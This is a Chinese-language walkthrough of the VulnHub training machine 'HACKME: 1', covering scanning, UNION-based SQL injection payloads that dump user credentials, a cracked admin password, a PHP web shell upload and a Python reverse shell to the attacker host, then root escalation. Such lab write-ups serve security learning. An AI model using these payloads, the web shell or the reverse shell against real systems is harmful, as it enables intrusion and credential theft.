靶机渗透HACKME: 1

Posted 独角授

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了靶机渗透HACKME: 1相关的知识,希望对你有一定的参考价值。

【靶机渗透】HACKME: 1

本篇将分享一个来源于VulnHub社区,适合初学者的靶机HACKME: 1

文章目录

0x01靶机介绍

1. 详情

链接https://www.vulnhub.com/entry/hackme-1,330/
发布日期2019年7月18日
作者x4bx54
难度初学者,简单

2. 描述

‘hackme’ is a beginner difficulty level box. The goal is to gain limited privilege access via web vulnerabilities and subsequently privilege escalate as root. The lab was created to mimic real life environment.

"hackme"是一个初学者难度级别的框。目标是通过 Web 漏洞获得有限的特权访问,然后将特权升级为 root。该靶机的创建是为了模拟现实生活环境。

0x02环境搭建

1. 下载靶机

官网链接直接下载

2. 创建靶机

下载好后直接将ova文件拖入VMware虚拟机即可,也可以使用VirtualBox 创建

创建完成

3. 开启靶机

点击 ▶开启此虚拟机

0x03靶机渗透

攻击机使用Kali Linux (IP:192.168.64.128)

1. 主机发现

arp-scan -l

发现目标主机 192.168.64.137

2. 端口扫描

masscan 192.168.64.137 --rate=10000 --ports 0-65535

识别2个开放的tcp端口22,80

3. 服务扫描

nmap -T4 -sV -O -p22,80 192.168.64.137

-sV服务版本 -T4速度(最高为5,推荐用4) -O系统 -p 指定端口

22是ssh,80是Apache http服务

4. web信息收集

目录扫描工具进行扫描,看能否找到可利用信息

访问该链接http://192.168.64.137/register.php,是一个网站注册页面

创建一个密码为safefox的用户safefox并登录。

这种网站类似于图书目录查询网站

可能有注入点

0x04漏洞利用

1.SQL注入

尝试进行手动 SQL 注入

01-判断类型

s' or 1=1-- -

单引号字符型注入

02-确定显示位

使用 UNION 命令来查找其中存在的列数

s' union select 1,2-- -

s' union select 1,2,3-- -

03-查询基本信息

识别正在使用的数据库

s' union select database(),2,3-- -

webapphacking

识别 SQL 数据库的版本

s' union select version(),2,3-- -

04-查找所有数据库

s' union select schema_name,2,3 FROM information_schema.schemata-- -

05-获取表名

s' union select group_concat(table_name separator 0x3c62723e),2,3 from information_schema.tables where table_schema=database()-- -

06-获取特定表列名

获取书籍和用户的列名

s' union select column_name,2,3 from information_schema.columns where table_name = 'books' -- -

s' union select column_name,2,3 from information_schema.columns where table_name = 'users' -- -

07-获取数据

s' union select group_concat(user,":",pasword),2,3 from users -- -

破解superadmin用户的密码hash:superadmin:2386acb2cf356944177746fc92523983

superadmin:Uncrackable

2.文件上传

登录管理员用户网页,发现上传点

上传2.php

<?php system($_GET['cmd']); ?>

上传成功,并知道文件已经上传到uploads文件夹

尝试访问http://192.168.64.137/uploads/2.php

3.反弹shell

接下来使用harkbar工具传递执行 python反弹shell

http://192.168.64.137/uploads/2.php?cmd=python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.64.128",6666));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'

攻击机nc监听

反弹成功!

通过以下命令获取一个标准shell

python -c 'import pty; pty.spawn("/bin/bash")'

4.提权

识别存在的用户

在/home/legacy文件夹中发现存在touchmenot二进制文件,执行touchmenot即可获取ROOT权限。

./touchmenot

以上是关于靶机渗透HACKME: 1的主要内容,如果未能解决你的问题,请参考以下文章

靶机渗透HACKME: 1

靶机渗透 HACKME-2 (详细渗透,适合新手渗透)

靶机渗透 hackme-1(详解,适合新手)

DC-1靶机的渗透学习

靶机渗透01

靶机渗透实战-Acid